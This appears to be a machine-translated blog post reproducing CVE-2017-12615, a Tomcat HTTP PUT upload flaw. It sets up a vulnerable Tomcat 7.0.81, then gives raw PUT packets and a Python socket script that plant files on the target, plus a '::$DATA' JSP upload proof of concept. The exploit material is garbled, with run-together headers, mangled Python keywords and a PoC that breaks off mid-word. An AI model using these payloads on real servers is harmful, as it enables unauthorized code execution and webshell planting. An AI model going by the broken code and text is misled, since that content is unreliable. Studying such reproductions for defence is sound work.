Vulnerability Name: cve-2017-12615-Remote Code execution vulnerability
cve-2017-12615: Remote code execution vulnerability
When Tomcat is running on the Windows operating system and the HTTP Put request method is enabled (for example, by setting the ReadOnly initialization parameter to false), an attacker would likely be able to upload a JSP file containing arbitrary code to the server through a well-constructed attack request packet , the malicious code in the JSP file will be able to be executed by the server. Cause data disclosure on the server or get server permissions.
With the above two vulnerabilities can execute arbitrary code on the user server, resulting in data leakage or gain server permissions, there is a high security risk.
Impact Range: Apache Tomcat 7.0.0-7.0.81
First download the 7.0.81 version on the Tomcat website
Download Link: http://mirrors.shuosc.org/apache/tomcat/tomcat-7/v7.0.81/bin/apache-tomcat-7.0.81.tar.gz
Build the apache-tomcat-7.0.81.tar.gz file on Linux and put it into the/usr/local/directory
Enter the bin directory in the terminal and enter the./startup.sh to open Tomcat
Subsequent access to the HTTP://192.168.149.129:8080 port provides access to the
Exploit steps
There is a Web. xml file in the/conf/directory to open the add readonly parameter with the property value false
Then send a put packet to the target server
put/123.html/http/1.1 host:192.168.149.129:8080 user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12dnt:1connection:closecontent-length:664<HTML><Head><title>Hack by SF</title></Head><Body>hack by sf!</Body></HTML>
The packet is a 123.html file generated at the root of the target
Here we write a script using Python.
The code is as follows
ImportSocketpoc=""; buffer= ("put/123.html/http/1.1\r\n""host:192.168.149.129:8080\r\n""user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12\r\n""dnt:1\r\n""connection:close\r\n""content-length:664\r\n\r\n"+POC) expl=Socket.socket (Socket.af_inet,socket. SOCK_STREAM); Expl.connect (("192.168.149.129", 8080)); Expl.send (buffer); Expl.close ();
After running:
Modify the 123.html suffix to upload any file.
Re-attach the Tomcat 7.0.79 POC:
Put/aedoo.jsp:: $DATA http/1.1192.168.1.1:8080Cache-control:max-age=0Upgrade- Insecure-requests:1User-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/60.0.3112.113 safari/537.36accept:text/html,application/ xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-language:zh-cn,zh;q=0.8 Cookie:Connection:closeContent-length:22 your JSP ma
Tomcat cve-2017-12615 remote Upload Vulnerability replication